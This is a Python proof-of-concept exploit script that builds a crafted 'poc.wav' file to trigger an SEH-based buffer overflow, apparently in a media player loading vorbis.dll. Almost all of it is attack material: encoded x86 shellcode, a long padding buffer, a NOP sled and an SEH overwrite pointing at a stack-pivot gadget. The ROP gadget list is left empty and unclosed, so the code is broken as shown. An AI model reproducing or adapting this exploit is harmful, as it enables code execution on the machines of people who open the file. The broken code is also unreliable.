import struct

   

def create_rop_chain():

   

    rop_gadgets = [

    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

   

rop_chain = create_rop_chain()

   

shellcode =  ""

shellcode += "\xbf\xaa\x7e\xf4\xa0\xd9\xec\xd9\x74\x24\xf4\x5a\x33"

shellcode += "\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x0f\x03\x7a\xa5\x9c"

shellcode += "\x01\x5c\x51\xe2\xea\x9d\xa1\x83\x63\x78\x90\x83\x10"

shellcode += "\x08\x82\x33\x52\x5c\x2e\xbf\x36\x75\xa5\xcd\x9e\x7a"

shellcode += "\x0e\x7b\xf9\xb5\x8f\xd0\x39\xd7\x13\x2b\x6e\x37\x2a"

shellcode += "\xe4\x63\x36\x6b\x19\x89\x6a\x24\x55\x3c\x9b\x41\x23"

shellcode += "\xfd\x10\x19\xa5\x85\xc5\xe9\xc4\xa4\x5b\x62\x9f\x66"

shellcode += "\x5d\xa7\xab\x2e\x45\xa4\x96\xf9\xfe\x1e\x6c\xf8\xd6"

shellcode += "\x6f\x8d\x57\x17\x40\x7c\xa9\x5f\x66\x9f\xdc\xa9\x95"

shellcode += "\x22\xe7\x6d\xe4\xf8\x62\x76\x4e\x8a\xd5\x52\x6f\x5f"

shellcode += "\x83\x11\x63\x14\xc7\x7e\x67\xab\x04\xf5\x93\x20\xab"

shellcode += "\xda\x12\x72\x88\xfe\x7f\x20\xb1\xa7\x25\x87\xce\xb8"

shellcode += "\x86\x78\x6b\xb2\x2a\x6c\x06\x99\x20\x73\x94\xa7\x06"

shellcode += "\x73\xa6\xa7\x36\x1c\x97\x2c\xd9\x5b\x28\xe7\x9e\x94"

shellcode += "\x62\xaa\xb6\x3c\x2b\x3e\x8b\x20\xcc\x94\xcf\x5c\x4f"

shellcode += "\x1d\xaf\x9a\x4f\x54\xaa\xe7\xd7\x84\xc6\x78\xb2\xaa"

shellcode += "\x75\x78\x97\xc8\x18\xea\x7b\x21\xbf\x8a\x1e\x3d"

   

   

   

junk = "A" * 3812

junk+= rop_chain + "\x90" * (308-len(rop_chain)-len(shellcode)) + shellcode

   

seh  = "\xd8\x2a\x9d\x63" # 0x639d2ad8 : {pivot 1132 / 0x46c} :  # ADD ESP,45C # XOR EAX,EAX # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [vorbis.dll] **   |   {PAGE_EXECUTE_READ}

    

   

buffer = junk + seh + "\x90" * 800

   

   

file = "poc.wav"